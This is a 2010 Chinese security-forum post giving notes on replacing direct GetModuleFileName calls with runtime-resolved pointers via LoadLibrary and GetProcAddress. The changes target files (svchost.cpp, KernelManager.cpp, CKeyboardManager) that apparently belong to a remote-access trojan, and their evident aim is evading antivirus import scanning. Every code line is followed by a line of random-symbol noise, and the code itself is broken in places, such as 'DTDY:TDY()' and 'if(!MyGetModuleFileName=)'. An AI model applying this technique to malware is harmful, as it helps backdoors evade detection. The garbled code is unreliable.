标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
* ]+ D8 |* F7 F2 D0 R) { w) _2 k5 d/ {; d
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
: J0 O0 x1 l1 v& B5 h' }/ N
----------------------------------------
- Q+ [, o/ q7 Z4 u, `7 M9 w$ S+ M( d
DTDY.h:
- ]4 {) |2 C, I& |: ^6 q5 y
) a& H) A3 F* z. D, a8 P
#if _MSC_VER>1000
- F8 [7 X- B \ K& D
#pragma once
8 W% O; Y; Y; r6 r) l
#endif //_MSC_VER>1000
. b: K# |1 X* N: T* {2 Q5 M7 _) r, b
#include<windows.h>
" C8 d) V+ ]6 {/ }
! E9 W' I) ]! }; ^- h
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
- W3 ?% E% Q8 p3 J! m) o" t- v
class DTDY
& P" |) ~& Y+ }' B {9 v5 n
{
( H2 M$ I9 b$ X- @' n1 B% f$ f; {
public:
' E' L4 k) }0 x1 J! f K4 H- p1 {1 i
DTDY();
. m* _! H2 d2 g i/ v: N) X
virtual ~DTDY();
' Q4 i6 c7 ^+ c5 {5 p
public:
* u, K2 S# T, z3 `( _
static pGetModuleFileNameA MyGetModuleFileName;
; X' t% g. I% ?& K' W% O: o5 a( u3 k( Z
static BOOL FunInitiallization();
# t# X, ~2 G1 {/ v, ~/ q
};
5 @* n( \3 Y6 S% N
#endif
/ Y. N9 c& R. k5 _
----------------------------------------
3 _$ p+ [0 v; @* p
# y9 i k' Q1 X4 Q8 V
DTDY.cpp:
; p- C' d& ~+ @/ {* m2 n# u( ~
1 w( s" j/ _3 V+ J7 ?
#include "DTDY.h"
! i, D8 G% j2 @# I9 D7 T
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
# \/ l( b7 h8 u% p0 g5 ~# ?7 n1 o9 H
DTDY:TDY()
4 f5 k6 \6 f! M$ Q7 L. i
{
, E* j! H: _3 o. w3 o% j1 {
}
8 V( l6 N; k: K6 P& X
DTDY::~DTDY()
8 @+ A. h- `# J
{
: e5 r8 n6 _2 J) h; |% l* P; Y
}
' w ?6 B( I8 I: ], Y% d' z
BOOL DTDY::FunInitiallization()
3 `* L" V8 K$ a& h2 r& v; H% p
{
, |& n: b* o& I; Y1 ^: y2 ] s& p( X
HMODULE hModule=LoadLibrary("kernel32.dll");
" `( @+ ` k* [* n' s& M* E
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
& z& p' A4 e: v
if(!MyGetModuleFileName=) return FALSE;
( Y0 Y9 G2 X7 x+ I8 K) b4 x
8 s7 ?$ A! }; Y( Z! Q. \
return TRUE;
4 V6 W& E- D3 D
}
3 s2 K' i3 z* O) i; ?
----------------------------------------
) d3 ^2 b/ B# l. J' o
svchost.cpp:
+ z+ W% w- [7 e1 H" F4 C! I
: Z( n/ e2 F. d2 G
#include "DTDY.h"
1 x( |: n1 _% v* B# I: t
" X7 r9 t( |0 X) Q w/ I/ a4 A
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
; I9 l6 n4 H/ n. x+ @/ B+ P
{
+ P8 N) p) u7 I
switch(ul_reason_for_call)
) g$ X$ y& N# {
{
' {) Y" h' `. ?3 ~0 Q6 c1 Z' k
case DLL_PROCESS_ATTACH:
' y7 Z. |1 u! c: I1 P% C* o
if(!DTDY::FunInitiallization()) return FALSE;
6 K! z% @, z* O7 J. f: Z! W5 W! ?: `0 z
* z+ Z& t" F9 ~( Q, B8 p
break;
, A# Z% V: z/ x. c9 z
}
; ?* M5 z$ _! i" \/ p3 F* J
}
/ _& i4 c Y3 N+ _" Y
9 h, |' K# P; e7 Q* i* E. }% h0 }9 j( r
5 `4 p& ]- G" y3 k
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
% L2 d0 w1 m, h" ]- D m; i' I. K
改写为
& W4 s# V! d ^$ w
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
3 a d+ K, L1 `3 t, G- J. x
----------------------------------------
: r7 o! x0 l. ?6 s' ?3 l5 S
KernelManager.cpp:
' J' m$ V4 F3 x
8 B$ ?+ A' {; Z! f+ P" f- e
#include "../DTDY.h"
; E+ f( v: y; R" W
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
5 L% z: ]2 O1 S V- P
改写为
0 K+ f! @) T, j" x2 F
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
4 n) [9 m' [& i2 }1 k
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
